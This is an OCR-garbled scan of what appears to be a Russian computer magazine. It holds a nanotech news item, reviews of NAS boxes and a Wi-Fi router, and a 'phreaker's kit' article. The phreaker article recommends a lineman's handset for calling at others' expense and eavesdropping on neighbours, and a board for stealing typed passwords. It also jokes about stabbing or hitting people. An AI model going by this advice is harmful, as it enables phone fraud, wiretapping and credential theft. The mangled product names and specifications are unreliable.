ритки (Магдиегііе Вау). Иссле)р^^Ь буй^^^рі^^жазу по двум дис- 
циплинам — геологии и Диалоги и^Икл «гол ого в — изучить отложения на 
^цне, оставшиеся отѴЗтериковых лЩ^Ипокрывавших залив 20 тысяч лет 
назад. ©тр словак оиологов, уча^^Ищих в этой экспедиции, никто еще 
деталР^цне и&аИедовал глубоко^^^Ий миру берегов Антарктиды. Так 
что и тут 



>АппаратІ5І5 
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ДНК-МАШИНЫ 
ОТКРЫВАЮТ ПУТЬ 

НАНОРОБОТАМ 

Ученые-нанотехнологи создали «руку робота» на основе 
молекулы ДНКи прикрепили ее к двумерной кристалличес- 
кой ДНК-матрице. Им впервыеудалось приделать сложное 
наномеханическоеустройство к матрице-кассете, сохранив 
его функциональность. Ученые доктор Симэн и его коллега 
доктор Баокан Динг изуниверситета Нью-Йорка в своей работе 
взяли за основуДНК-машину РХ-5Х2 БЫА, которая имеет2 
структурных состояния, «переключающихся» при поворо- 
те одного из концов молекулы. Кассета — это специальная 
плоская ДНК-структура, играющая роль фундамента для 
«руки робота». Она состоит изтрех спиральныхучастков ДНК 
— доменов, один из которых короче остальных и при соеди- 
нении с «рукой робота» заставляет последнюю располагаться 
в плоскости, перпендикулярной кассете. Так исследователи до- 
билисьэффективного прикрепления ДНК-наномашины в строго 
определенном направлении к двумерной ДНК-матрице. Атом- 
но-силовая микроскопия показала, что ДНК-наномашина, ра- 
ботающая как«рука робота», нормально функционирует после 
соединения с кассетой. Ранее доктор Симэн и его коллеги 
создали машину-транслятор, позволяющую синтезировать 
полимеры на основе стабильной РХ-5Х2 наномашины. По 
мнению исследователей, это открытие — первый серьезный 
шагк развитию наноробототехники, так какДНК-машину можно 
тиражироватьс помощью генной инженерии. 

ТЕЛЕВИЗОР 

СНАРУЖИ 

Внешнихустройств становится все больше и больше, но вот 
ТВ-тюнеров среди них пока что не очень много. Но си- 
туация меняется. Так, компания Сотрго анонсиро- 
вала модельѴібеоМаіе Ѵ600 —тюнер с широкими 
возможностями. Это стильный внешний девайс, цвети дизайн 
которой украсятлюбой рабочий стол. Для удобства работы 
тюнер имеет пультдистанционного управления, такчтохрес- 
томатийное лежание на диване с ДУ в рукахты получишь. Ле- 
жать можно перед любым типом мониторов и даже перед 
проектором, благо подключение к ним поддерживается. Также 
поддерживается разрешение до 1680x1050, что есть очень 
хорошо. Удобству общения с устройством способствуют 
бездрайверное подключение и таймер сна. Крометого, из 
интересных и полезных особенностей стоит отметить под- 
держку мониторов с различными соотношениями сторон 
и диагоналями, функцию «картинка в картинке», отображение 
видео на рабочем столе и возможность как вертикальной, так 
и горизонтальной установки. 
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Интерфейсы: РЛ-45 10/100 Мбит/сек, 1x115В 2.0 
УІ“РІ: нет 

Слоты под диски: і 

Возможность расширения через НЗВ: нет 
Инвертор питания: внешний 
Размеры: 227x1 19x56 мм 
Вес: 0,44 кг 

Бокс для І_АІ\І-диска от компании Адезіаг изготовлен из алю- 
миния. Передняя и задняя панели этим похвастаться не могут 
— они пластиковые. Девайс обладает весьма компактными 
размерами, а внешний вид можно даже назвать аскетичным. 
Ничем особенным бокс не выделяется: с тыльной стороны пре- 
дусмотрены соединение 115В 2.0 (через кабель), ЕШегпеІ 
10/1 00 Мбит/сек и нестандартный шести контактный выход 
на питание. На передней панели — подсветка в виде синего 
диода. Также девайс способен отображать температуру І-Юй 
в процессе работы. Для этого предусмотрен внешний термо- 
датчик, который пользователь может приаттачить по своему 
усмотрению. Диск помещается внутрь бокса достаточно плотно. 
Плюс ко всему, его можно зафиксировать четырьмя винтами 
из комплекта поставки. Верхняя и нижняя крышки устройства 
соединяются между собой с помощью резиновых зажимов. 
Нельзя сказать, что это оченьудобно, однако лучше уж та к, чем 
хвататься каждый раз за отвертку. 

Отметим шумность работы вентилятора. Рассматриваемый бокс 
использует в качестве чипсета схему РОС Р2882, которая, прямо 
скажем, отрицательно влияет на скорость передачи данных. 
Если производить передачу по ІІ5В-каналу, то скорость еще 
может считаться приемлемой, но если кидать файлы через І_АЫ, 
то пользователи довольны явно не будут. Софт, поставляемый 
в комплекте, не обновляется уже давно. А то ПО, которое есть 
в наборе с девайсом, недостаточно удобно. Когда бокс в соб- 
ранном состоянии, его переднюю панель можно отогнуть рукой 
в сторону. При этом ширина зазора будет порядка сантиметра. 
На скорость передачи данных это вряд ли повлияет, но уже 
только по этому факту можно судить о качестве сборки. 
Мануап в комплекте нельзя назвать подробным, да и написан 
он только на английском языке. 



Интерфейсы: Ри-45 1 0/1 00 Мбит/сек, 2х 1)5В 2.0 
ѴІ-ГІ: есть 
Слоты под диски: 1 

Возможность расширения через І_ІЗВ: есть (2х 115В 2.0) 
Инвертор питания: внешний 
Размеры: 206x140x55 мм 
Вес: 0,93 кг 

Компания ТРЕЫОпеІ: уже давно работает на российском рынке сетевого 
оборудования, так что качеству устройств от этой фирмы можно дове- 
рять. К сожалению, девайс приехал к нам с минимальной комплекта- 
цией (была лишь подставка да шнур) и без упаковки, поэтому перейдем 
сразу к внешнему осмотру. Сам бокс достаточно тяжелый вес прибли- 
жается к килограмму, так что использовать его в качестве мобильного 
носителя не оченьудобно. Кнопка включения и диоды индикации 
расположены на передней панели. Индикаторов всего 6. Цвет корпуса 
традиционно синий. Верхняя крышка снимается путем удаления двух 
крепежных винтов. Сам винчестер укладывается в алюминиевую 
люльку и закрепляется четырьмя винтами. Портов И5В всего 2 — один 
на лицевой панели, другой с тыльной стороны. Для использования 
беспроводного соединения предусмотрена антенна. При желании ее 
всегда можно открутить. Вентиляция винчестера — активная. Бловер 
формата 40x40 мм установлен на задней панели и работает на выдув. 
Отдельно отметим, что сетевой дискТВЕЫОпеіТ5-І300 будет работать 
со всеми современными системами, будь то ѴѴіпсІоѵѵз, МАС или Ыпих. 

Софт регулярно обновляется на сайте производителя, а ПО в комплекте, 
наверное, одно из самых комфортных и функциональных. 

Из минусов этого устройства стоит отметить не самый удобный интерфейс 
доступа к данным. 

Здесь мы имеем дело с системой РОС 3210, которая использует 
внутреннюю ось ЕтЬесИесІ Ыпих. Установка НЮй, а именно фиксация 
с помощью четырех винтов, займет некоторое время. Без определенной 
сноровки и отвертки с магнитным наконечником проделать всю опера- 
цию будет нелегко. 

> Для каждого бокса 
тест проводился 3 
раза (и для чтения, 
и для записи), 
после чего резуль- 
таты по времени 
усредняли 
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Ѵіроѵѵег 

ѴРА-3528Ые* Зііѵег 

•••••••000 

Интерфейсы: Р.І-45 1 0/100 Мбит/сек, 1)5В 2.0 
УІ-РІ: нет 

Слоты под диски: 1 

Возможность расширения через иЗВ: нет 
Инвертор питания: внешний 
Размеры: 1 1 5x40x220 мм 
Бес Брутто: 0,62 кг 

Это устройство позиционируется производителем какуни- 
версальный внешний контейнер для И00 с интерфейсом ЮЕ. 
Девайс максимально прост для ЫА5-устройств своего класса. 
Корпус изготовлен полностью из алюминия. Ничего лишнего 
не предусмотрено - лишь на одной из сторон «выгравирован» 
логотип компании Ѵіроѵѵег. Люлька для винчестера выдвига- 
ется путем удаления четырех винтов с тыльной стороны, через 
переднюю створку вместе с лицевой панелью. Удивительно, 
но это первый девайс в нашем обзоре, мануал к которому 
написан на русском языке — мелочь, а приятно. Устройство 
может служить не только как сетевой носитель данных, но и как 
обычный внешний жесткий диск. С тыльной стороны предус- 
мотрены свитч оп/оК, УЗВ-коннектор, ЕІбегпеІІО/100 Мбит/сек 

и кнопка экстренной перезагрузки. 

Вообще, вся процедура извлечения люльки для НОй и уста- 
новки его на свое законное место — дело, требующее времени. 
Во-первых, необходимо скрутить 4 винта, ну а после этого 
дол го трясущимися руками выдергивать из корпуса подлож- 
ку с начинкой. Подложка застревает, а если и «едет», то со 
скрипом. Вентилятор, несмотря на свои крошечные размеры, 
работает за четверых, и, прежде всего, это касается шума. 
Длина шлейфа, который соединяет печатную плату с пере- 
дней панелью индикации, настолько велика, что жесткий 
диск не может занять свое место без усилий. Мало того, нужно 
очень сильно постараться, чтобы отверстия на боковых стенках 
люльки совпадали с отверстиями на винчестере. Кстати, руко- 
водство пользователя верно лишь для ѴѴіпсІоѵѵз. Л инуксоидам 
и МАСОЭ’истам придется разбираться самостоятельно. 




ИНТ ер-рейсы: РЭ-45 1 0/1 00 Мбит/сек, 115В 2.0 
ѴІ-РІ: нет 

Слоты под диски: і 

Возможность расширения через ІІЗВ: нет 
Инвертор питания: внешний 
Размеры: 122x35x215мм 
Вес Брутто: 0,55 кг 

Все спецификации и подробное описание особенностей 
Ріозіоп иы Оіэкданы на двух языках - русском и английском. 
Сам девайс можно оценить, наверное, каксамый изящный 
и элегантный бокс во всем обзоре. Аскетичный корпус изго- 
товлен полностью из алюминия и выкрашен в серебристый 
цвет. Исключение составляютлишь панельки - они сделаны 
из пластика, но заметно это только при ближайшем рассмот- 
рении. В продаже можно найти девайсы красного, синего 
и черного цвета. На боку корпуса сверкает логотип производи- 
теля. Заметим, что РІозйп им Оівк не стыдно будет подарить 
или использовать в офисе. В комплекте мы нашли подставку 
для установки ЫАЗ-девайса в вертикальное положение, набор 
необходимых кабелей для работы с Ріозіоп ЦМЧ Рівк и мануал 
с подробной инструкцией. 

За элегантность внешнего облика придется расплачиваться 
функциональностью и удобством. Первое, что хочется отметить, 
- это то, что люлька связана с самим корпусом через короткий 
провод, который отвечает за подсветку передней панели. 
Хорошо, что последний не припаян намертво (его можно 

отсоединить), иначе сама процедура установки винчестера 

превратилась бы в пытку. Однако, чтобы задвинуть подложку до 
конца, требуется приложить серьезные усилия, да так, что на- 
чинаешь волноваться за сохранность хрупкой тыльной панели, 
на которую приходится опираться. На передней панели имеет-’ 
ся прозрачная надпись«|_ап Оізк». через которую, собственно, 
виден мигающий диод - симпатично, но не информативно. 

Что в данный моментпроисходитс ЫАЗ-адаптером (подсоеди- 
нение через УЗВ, использование иы, заполнение диска и т.п.), 
понять очень сложно. Мануал, несмотря на то что на коробке 
было все так радужно, написан исключительно на английском 
языке, и то только для пользователей ѴѴіпсІоѵѵз. Хотя в специ- 
фикациях производитель утверждает, что дисклегко работает 
и в МАО 05, и в ШІІХ. 



ГІ08І0П иы Оі$к 

•••••••ООО 



ІезЦ.аЬ выражает благодарность за предоставленное на тестирование оборудование компаниям «НИКС — Компьютерный Супермаркет» (т. (495) 97^ 
ЗЗЗЗ. ѵѵѵт.піх.ги ).А[сотІ:гасІе[т. (495) 785-8657. ѵѵѵѵѵѵ.а[соппІ:гасіе.ги ). а также российским представительствам компаний ЫЕТ6ЕАР иТРЕЫОпеС 
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ЗагоіесН ІІ-ЗТОВ 
ЫО$-354иІ-Ше 

Интерфейсы: К>45 1 0/1 00 Мбит/сек, 015В 2.0 

УІ-РІ: нет 

Слоты под диски: 1 

Возможность расширения через ІІьВ: нет 
Инвертор питания: внутренний 
Размеры: 145x37x220 мм 
В*с Брутто: 0,76 кг 

Ещеодноустройство в нашем обзоре, которое позволяет 
напрямую подключаться к сети без сложной ІР-настройки или 
непосредственного участия сервера. Первое, на что хоте- 
лось бы обратить внимание, - это сумка в комплекте. Очень _ 

качественный и крепко сшитый баул с кармашками -за такой 

І и денег отдать не жалко. Помимоэтого, в яркойупаковке 
совершенно случайно оказались пластиковая пластина для 
установки Загоіесб 11-510* Ы05-354иІ-ѴѴЫІе в вертикальное 
положение, кабель питания, 4 винта для фиксации винчестера, 
а также ЦМ- и ІІ5В-шнуры. Внешний вид девайса очень офи- 
циален - он напоминает скорее медицинский приборузкого 
назначения, чем ЫА5-устройство. Верхняя панель изготовлена 
из толстого алюминия и выкрашена в белый цвет. Темно-се- 
рое основание одновременно играет роль люльки - крышка 
крепится к нему с помощью четырех винтов. После ее удаления 
пользователю открывается шикарный вид на внутреннос- 
ти Вагоіесб 11-5Т0К Ы05-354иІ-ѴѴЫ1е. В качестве чипсета 
используется схема ХІМеІа МОА52021 ревизии 1.1. Отметим, 
что преобразователь напряжения собран непосредственно ^ 
внутри бокса. Подключение производится через стандартный 
трехконтактный кабель. 

Система фиксации винчестера просто отвратительна. 

Крепление осуществляется безвинтовым методом, то есть 
жесткий дискукладывается на 4 свободных штыря, после чего 
охватывается сверху пластиковой пластинкой. Если встряхнуть 

с небольшой силой бокс вместе с винчестером, то слышно, 

каклихо подскакивает вн^ри НОВ. В связи с этим интересно 

узнатьу производителя, какпереносить данную композицию. 

Наверное, выкладывать сумку поролоном. После двух-трех 

извлечений краска с тыльной стороны крышки сдирается 
-это не принципиально, но сам фаст неприятен. Отметим 
также, что охлаждение винчестера осуществляется пассивным 
методом, то есть никаким. Система теплоотвода отсутствует как 
факт — о вентиляторах и говорить нечего. 




Интерфейсы: Р>45 10/100 Мбит/сек 
ѴІ-РІ: нет 

Слоты под диски: 2 

Возможность расширения через 115В: нет 
Инвертор питания: внешний 
Г авариты: 171x1 08x144 мм 

Рассматриваемый бокс, в отличие отпрочихдевайсов, описан- 
ных в обзоре, рассчитан на подключение одновременно двух 
винчестеров. Корпус выполнен из белого пластика. Винчестеры 
подключаются через отсеки, спрятанные под передней пане- 
лью бокса. Крепление полностью безвинтовое — диск просто 
помещается в отсек. Крышка отбрасывается одним движени- 
ем руки. На лицевой стороне предусмотрено подобие замка. 

На самом деле, это диске продольной прорезью. Достаточно 
повернуть в нем отвертку на 90 градусов и доступ будет открыт. 
Охлаждение — отдельная тема. С винчестерами соприкасается 
алюминий, причем со всех четырех сторон. С верхней и нижней 
стороны на открытый воздух выводятся массивные радиаторы, 
которые со своей работой справляются весьма эффективно, 
хотя для охлаждения двух объемных винчестеров было бы 
неплохо оснастить Ые1:деаг5С1 01 небольшим вентилятором. 
Поверхность радиаторов сильно нагревается, а небольшой шум 

— малая цена за качественное охлаждение важной информации. 
Логично предположить, что производитель не задумывал 
ЫеІдеагЗСІОІ какустройство, предназначенное для перенос- 
ки. Дело в том, что ЬЮй не зафиксированы ничем и ход диска 
между металлическими стенками составляет где-то 0,5-1 мм. 
Однако передняя панель прижимает дискдостаточно плотно 

— внутри, в месте соприкосновения НйО с задней стенкой, ус- 
тановлена прокладка, смягчающая вибрации. Про ІІЗВ-соеди- 
нение инженеры забыли, хотя порой бывает полезно и удобно 
подключиться в качестве внешнего носителя. 

□ Вывод 

Все рассмотренные в обзоре устройства могут стать отличны- 
ми помощниками в организации сетевого хранилища. Однако 
стоит выделить некоторые из них. Нам очень понравился Ыеідеаг 
ЗС101 — отличные возможности по отличной цене. За это, 
собственно, мы вручаем ему награду «Лучшая покупка» . А вот 
девайс который действительно, можно назвать шустрым и мно- 
гофункциональным, — ТПЕЫОпеІТЗ-ІЗОО. Конечно, и он не без 
недостатков, однако их, по сравнению с остальными устройс- 
твами в обзоре, очень мало. За проявленные заслуги объявляем 
ѳму благодарность и вручаем награду «Выбор редакции». □□ 
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;ергей долин 
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^ ^еггит 









^ Геггит 



Стать крутым фрикером — мечта многих ребят. Мне часто приходят письма с воп- 
росами, как стать фрикером, мол, научи и т.п. Вот я и решил сделать серию статей 
по этой тематике. Начну с чемоданчика фрикера. Это тот необходимый каждому 
телефонному пирату набор, который он должен всегда носить с собой. Даже когда 



идет на свидание с девушкой. 
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7. ГАЗОВЫЙ ПАЯЛЬНИК 1 1 . РАЗВОДНОЙ КЛЮЧ 



1. КОНТРОЛЛЕР/ 
ПРОГРАММАТОР 

2. МОДЕМ 

3. УНИВЕРСАЛЬНЫЙ НОЖ 
(ПАССАТИЖИ, ОТВЕРТКИ 
ИТ.П.) 



4. ИНСТРУМЕНТ ДЛЯ 
ЗАЧИСТКИ ПРОВОДОВ 

5. УНИВЕРСАЛЬНЫЙ ИК- 
ДЕВАЙС 

6. МУЛЬТИМЕТР 



8. КПКС Р5-232 (НАПРИМЕР, 
РАІ_М М100) 

9. НАБОРФРИКЕРСКИХ 
ОТВЕРТОК 

1 0. ТРУБКА МОНТАЖНИКА 






^ ^еггит 



Необходимый набор 

Определим, что же фрикеруХХІ века необ- 
ходимо носить с собой. Нижеследующий 
перечень не претендует на классический об- 
разецдля подражания, однако мне кажется, 
что он будет весьма полезен начинающим. 
Итак, вотон. 

1 . Трубка монтажника 

2. Мобильный телефон 

3. Универсальный нож (пассатижи, 
отвертки и т.п.) 

4. Провода, крокодилы 

5. Мультиметр 

6. Газовый паяльник 

7. КПКс Н5-232 (например, Раігш пп 1 00) 

8. Модем 

9. Ноутбук 

10. Набор флюсов и припоев 

1 1 . Изолента 

12. Разные боксы и всякая полезная мелочь 

13. Асоизбс соиріег 

14. Набор фрикерских отверток 

15. Контроллер/программатор 

16. Разводной ключ 

Рассмотрим некоторые пункты этого списка 
более подробно. В зависимости от степени 
нужности рядовому фрикерутого или иного 
устройства я ставил ему оценку в баллах, от 
одного до десяти. 



КПК 



■НИВЕРСАЛЬ 
НЫИ НОЖН 



★★★★★★★★★★ 

Эта вещь должна бытье тобой везде 
и всегда, даже если ты не фрикер. Быстро 
разобрать любой девайс, согнуть толстый 
провод, перекусить провода, что-то подто- 
чить, обжать, колбаску порезать, пырнуть 
кого-нибудь :) — да мало ли еще у него 
применений. Скажу одно, с этим ножиком 
я не расстаюсь никогда и ни капли не жа- 
лею о его приобретении. 

Плюсы: может иметь встроенный набор 
разнообразных отверток, иногда поставляет- 
ся в виде молотка, пассатижи даже гаечного 
ключа. 

Минусы: сходит за холодное оружие и может 
вызвать проблемы (хотя я проблем с ним 
не имел). 



ТРУБКА 
МОНТАЖНИКА 



Этот девайс просто необходим фрикеру, 
звонящему за чужой счети любящему 
послушать разговоры соседей. В купе со 
встроенным антиАОНом и Воск ВОХ может 
стать грозным орудием подстав. Если делать 
его лень, то вполне можно купить в специа- 
лизированных магазинах. 

Плюсы девайса: можно юзать везде, где 
есть телефонная линия; весьма мобилен; 
имеет ряд полезных функций; подвластен 
расширению в умелых руках. 

Минусы: трубка занимает много места 
— если с ней возьмут, то не сможешь при- 
~ кинуться домкратом и сказать, что проходил 
мимо. 






Если ты крутой гуру программирования, 
умеешь кодить под КПК и владеешь интер- 
фейсами этого девайса, то эта штука — для 
тебя. В купе с прямыми руками и хорошими 
мозгами, с этим устройством ты сможешь 
свернуть горы покруче, чем в самых луч- 
шихфильмах про хакеров. К нему можно 
цеплять модемы или мобильныетелефоны 
и хакать прямо из метро. 

Плюсы: можно найти КПКс х86-архитек- 
турой (как на фото), с нормальным интер- 
фейсом П5-232 и цеплять к немулюбые 
устройства, понимающие этот интерфейс. 
Минусы: в руках новичка будет беспо- 
лезной игрушкой, которая может еще и 
повредить делу. 



Универсальный измерительный прибор 
должен находиться в портфеле каждого 
настоящего гуру. С ним легко потестить любое 
устройство, разобраться, где неполадка в де- 
вайсе. В купе с газовым 
паяльником, небольшим набором деталей 
или процессорной платой может стать просто 
полноценным выносным фрикерским комп- 
лексом. 

Плюсы: с помощью него можно измерять 
громадное количество параметров, 
в зависимости от модели; позволяет про- 
званивать провода, определятьобрывы 
и различные неполадки. 

Минусы: во многих ситуациях абсолютно бес- 
полезный, занимающий место ящик. 



Я 



★★★★★★★★★★ 
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Паяльник— верный спутникфрикера. 

Но любому паяльнику, даже самому сов- 
ременному, нужна розетка. А если ты на 
полевых работах и питание достать ой как 
сложно, то тебя всегда выручит газовый 
паяльник. С нимты можешьдаже в дороге 
собрать любой прибор или наконец починить 
свои наушники. 

Плюсы: полная независимость отэлектро- 
энергии; можно использовать для резки 
пластмассы, для усаживаниятермоусадки 
и прочих вещей, где нужна высокая 
температура. 

Минусы: весьма громоздкий, требует посто- 
янной дозаправки газом; можно обжечься. 
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ПРОЦЕСС ОРНАЯ 

ПЛАТАК^^Н 






НАБОР МИНИ 
АТЮРНЫХН 

отверток! 






Это, наверное, самый нефрикерский 
девайс в нашем обзоре. Но он будет поле- 
зен при попытке открутить какое-нибудь 
устройство, на при мер таксофон, для даль- 
нейшего исследования. А можно и двинуть 
гопам по мордасам, если докопаются до 
крутого ф рикера при занятии любимым 
делом. Плюсы: выглядит стильно и внуши- 
тельно. Идя по темнымулицам, испыты- 
ваешьуверенность, помня, что он с собой. 
Имеет множество полезных и бесполезных 
функций. Может стать очень«весомым 
аргументом» в неудавшемся разговоре. 
Минусы: вполне сходитза холодное ору- 
жие, занимает много места и достаточно 
тяжелый. 



★★★★★★★★★☆ 

Если ты часто раскручиваешьутонувшие 
мобилы, лэптопы, фотоаппараты и прочие 
мелкие электронные девайсы, и притом 
везде и всюду, то этот набор просто обязан 
статьтвоим постоянным спутником. 
Коллега оставитсвой ноутбез присмотра, 
и ты в тот же миг сделаешь ему электрон- 
ноезападло :). 

Плюсы: позволяет вскрыть множество 
хитрых электронных устройств. 

Минусы: подходит только для мелких вин- 
тиков, но это полностью компенсируется 
наличием фрикерского ножа. 



Настоящий фрикер делает многие эмулято- 
ры на микроконтроллерах, разводя при этом 
плату и паяя множество устройств. Что ме- 
шаетему при купить та кую процессорную 
плату под фаворитный ему контроллер и де- 
лать эмуляторы в дороге с ноутбука и КП К. 
Можно построить свой универсальный 
фрик-девайс, имеющийтысячи функций; 
использовать как логический анализатор 
в купе с КПК или лэптопом. В общем, бес- 
ценная штучка за копеечные деньги. 

Плюсы: число возможных функций платы за- 
виситтолько оттвоей фантазии и кошелька. 
С ней можно делать громадное количество 
различных взломов, снятия логов, похищать 
пароли, вводимые с клавиатуры, делать 
ключи-карты — всего не перечислишь. 
Минусы: полезна только в опытных руках, 
при неплохом знании электроники и про- 
граммирования. В руках новичка — беспо- 
лезный кусок пластика. 



К моде му 



«ПОВЕЛ 


ИТЕЛ 


ЬІ 


ТЕЛЕВИ 


ЗОРО 


в > 7 ] 



ігігігігігСгСгСгСгСт 



Ты любишь смотреть телик? Я терпеть 
не могу — когда вижу работающий ящик, 
судорожно ищу пульт, чтобы вырубить 
этот слив. Теперьу тебя есть отличная воз- 
можность, не ища пульт, а достав брелок 
от ключей, вырубить любой телик. Торгуют 
этим супердевайсом тут: ѵѵѵѵѵѵТѵзеіоІТсот. 
С этим устройством ты сможешь некисло 
веселить друзей, прогуливаясь по тор- 
говым центрам и нажатием всего одной 
кнопки гася сотни теликов. 

Плюсы: миниатюрность, легкость исполь- 
зования; подходит практически для всех 
типовтелевизоров; являясьунивер- 
сальным выключателем, можеточень 
повеселить. 

Минусы: не оченьхорошая сборка, при на- 
личии прямых рук и небольшого количест- 
ва времени можно сделать самому. 



Акустический соединитель был основным 
инструментом хакеров 80-90-х в США. 

В наши дни — вымирающий девайс. Может 
быть полезен при взломе с таксофонов 
(зачем, есть же 6РР5?) либо для анонимной 
отправки факса. 

Плюсы: ретродевайс, может служить атри- 
бутом моды у фрикеров; позволяет вести 
соединения практически с любыхтелефо- 
ном; вместе с радиотелефоном образует 
радиомодем. 

Минусы: необходимо специальнохитро 
настраивать модем; очень низкая скорость 
соединения (скорее всего не удастся 
выжать больше 14400); занимает много 
места; требует дополнительного питания; 
моральноустарел. 



> Принципиальная схема 



ИЗГОТОВЛЕНИЕ 
АКУСТИЧЕСКОГО 
СОЕДИНИТЕЛЯ 

Простейший акустический соединитель 
может сделать каждый из нас. Для его 
изготовления потребуется трубка от старого 
совкового телефона, где есть угольный 
микрофон и динамик. Разбираем трубку. 
Там будут хитро соединены микрофон 
и динамик, нужно их соединить последо- 
вательно с девяти вольтовой батарейкой 
и шнурком с разъемом, который будет 
вставлен в модем (смотри схему). То есть 
так: разъем -> микрофонѣ динамик -> 
батарейка -> разъем. Полярность батарейки 
роли не играет. 

% 






сегда отрадно, когда производи- 
тель поворачивается лицом к поль- 
зователю и идет ему навстречу. 
Такуж повелось, что российские 
условия и особенности организации про- 
вайдерскихуслуг вызвали дополнительные 



требования к оборудованию со стороны юзера. 
Среди провайдеров особой популярностью 
пользуется протокол авторизации РРТР, причем 
очень распространены такие ситуации, когда 
сам РРТР-сервер находится за пределами 
пользовательского сегмента. Далеко не каждый 
роутер заработает при таком раскладе. Очень 
распространенным недостатком аппаратных 
роутеров является также и то, что после актива- 
ции интернет-соединения по протоколу РРТР 
они забываютпро локальную сеть провайдера. 
Таким образом, нам приходится выбирать из 
двух зол: доступ к ресурса м локал ьной сети без 
интернета или наоборот. Работа с учетом этих 
тонкостей требуеттщательной переработки 
РРТР-клиента в роутере и адаптации функции 
статической маршрутизации. 

Нетакдавно российское представительс- 
тво компании ЕеѵеЮпе объявило о выпуске 
тестовой прошивки, поддерживающей все 
эти функции, для своейтоповой модели ѴѴІ-Рі 
роутера ѴѴВР-5400. 



□ Внешний вид 

Роутер упакован в серебристо-серый корпус 
небольших размеров. С лицевой стороны нахо- 
дится кнопка «Резеі» и светодиоды: питания, 
текущего состояния устройства, активности 
беспроводного сегмента, ѴѴАЫ- и ЕАЫ-портов. 
Причем для последних выведено по 2 свето- 
диода: один сигнализируето подключении 
на данном порту, а по второму можно опреде- 
лить скорость соединения (10/100 Мбит/сек). 

С тыльной стороны располагается гнездо для 
подключения питания, ѴѴАЫ- или ЕАЫ-порты, 
а также 2 разъема для подключения внешних 
антенн. Разъемдля подключениятретьей 
антенны находится на левом боку роутера. Все 3 
антенны абсолютно идентичные, с коэффициен- 
том усиления 5 бВІ. 

□Аппаратная начинка 

Маршрутизатор построен на базе микросхемы 
АМПІ5С 1 0000-Ѳ. Используется 2 Мб оператив- 
ной памяти ЕігопіесИ ЕМ6361 65Т5-7, функци- 
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онирующей на частоте 143 МГц. Флеш-память 
объемом 1 Мб представляет собой микросхему 
ЕОЫ ЕЫ29ЕѴ800ВВ-70ТСР. За ѴѴІ-Еі отвечает 
чипсет Ра И п к РТ2661Т, поддерживающий 
стандарты ІЕЕЕ 802.1 1 Ь/д. Несмотря на наличие 
трех антенн, здесь используется только 1 тран- 
сивер. Увеличениеже скорости, по сравнению 
со стандартом ІЕЕЕ 802.1 1 д, получается за счет 
использования общеизвестных технологий 
Егате Вигвбпд и Егате Аддгедабоп. Также 
на плате распаян чип коммутатора РеаЕек 
РТЕ83055С с возможностью организации ѴЕАЫ 
и частичной поддержкой функций 0о5. 

□ Функциональные возможности 

Настройка роутера возможна только посредс- 
твом ѵѵеЬ-интерфейса. Окно приветствия содер- 
жит не только поле ввода пароля администрато- 
ра, но и страницу состояния устройства. Та ким 
образом, понять, что происходите интернет-со- 
единением можно без «логининга». Доступные 
пользователю функции во многом стандартны 
для подобного класса устройств. Однако стоит 
отметить широкие возможности фильтрации 
трафика и трансляции портов ЫАРТ. Как и во 
всех новых роутерах, здесь используется ЗіаІеМІ 
Еігеѵѵаіі (5РІ — БМеМІ Раскеі Іпзресііоп), 
не работающий с пакетами по отдельности, а от- 
слеживающий логику устанавливаемых соеди- 
нений. Сто ит также сказать, что ѴѴІ-ЕІ у роутера 
поддерживает функцию ѴѴ05, которая позволяет 
объединять несколько точек доступа в одну ѴѴІ-Еі 
сеть для увеличения зоны покрытия. 

□ Методика тестирования 

Длятестирования проводного и беспроводного 
сегментов использовался программный продукт 
ІМеШ СЬагіоІ: и скриптТНгоидЬрЫ с переда- 
чей пакетов максимального объема. На двух 
станциях уста на вливались та к называемые 
епфоіпі-программы, затем в консоли №Ш 
СЬагіоІ запускался скрипт генерации трафика. 

1. Притестировании пропускной способности 
ѴѴАЫ-> ЬА1\1 одна из станций подключалась 

к одному из портов свитча (интерфейс ЕАІ\І), вторая 
— к ѴѴАЫ-порту. Таким образом, мы получали 
пиковую пропускную способность для ѴѴАЫ-интер- 
фейса (также ее можно называть скоростью ЫАТ). 
Измерялась скорость однонаправленной пере- 
дачи (направления ѴѴАЫ -> ЬА1\1 и ЬА1\1 ->\А/АЫ) и 
передачи в режиме полного дуплекса (ЕйХ). 

2. Поскольку при активации интернет-соедине- 
ния по протоколу РРТР создается дополнитель- 
ная нагрузка на центральный процессор роутера, 
мытакже измеряли пропускную способность 
РРТР. Для этого за ѴѴАЫ-интерфейсом маршру- 
тизатора был поднят ѴРЫ-сервер. Крометого, 
проверялась возможность установки ѴРІ\І-соеди- 
нения в случае размещения ѴРЫ-сервера вне 
сегмента нахождения нашего маршрутизатора. 

3. Для оценки скорости ѴѴІ-ЕІ мы использовали 
РСМ С ІА- карточку ЬеѵеЮпе ѴѴРС-0500. Измере- 



ния проводились в типичной квартире из 
трехточекс разным удалением от роутера. 

В первом случае удаление не превышало 
одного метра и, следовательно, измеря- 
лась максимальная скорость передачи дан- 
ных. Во втором ноутбуке ѴѴІ-ЕІ адаптером 
находился на расстоянии 1 0 метров от точки 
доступа по диагонали за стеной. В третьем 
удаление отточки доступа составляло 20 
метров за двумя стенками, одна из которых 
являлась капитальной. Во всех случаях 
использовалась шифрациятрафика ѴѴРА-Р5К 
с ключом ТКІР. 

4. В качестве дополнительного исследова- 
ния была проведена проверка науязвимости 
со стороны ѴѴАЫ-интерфейса с помощью про- 
граммного продукта ТепаЫе №55Ы5. Сканиро- 
вание проводилось в двух режимах: с включен- 
ным и выключенным файрволом. 

□ Результаты тестов 

Роутер показал выдающиеся результаты 
пропускной способности ѴѴАКІ-интерфейса 
в режимеБіабс ІР (ЫАТ Опіу). В направлении 
ЕАЫ -> ѴѴАЫ она составила 87,23 Мбит/сек, 
в направлении ѴѴАІМ -> ЕАІМ — 81,17 Мбит/сек, 
а в режиме полнодуплексной передачи — 

82,35 Мбит/сек. 

Стестовой прошивкой, предоставленной 
представительством ЕеѵеІОпе, РРТР, действи- 
тельно, полностью адаптирован под российские 
условия. Соединениеустанавливается даже 
в случае нахождения ѴРІМ-сервера за шлюзом 
провайдера, и при этом функция статической 
маршрутизации позволяет сохранить доступ 
к локальным ресурсам провайдера. Все это ра- 
ботаеттакже и в случае режима Оупатіс I Р, то 
есть когда настройки получаются с ОНСР-сер- 
вера. Пропускная способность РРТР-туннеля 
средняя. В направлении ЕАІМ -> ѴѴАІМ она 
составляет 18,94 Мбит/сек, в направлении ѴѴАЫ 
-> ЕАЫ — 22,81 Мбит/сек, в полном дуплексе 
— 22,36 Мбит/сек. 

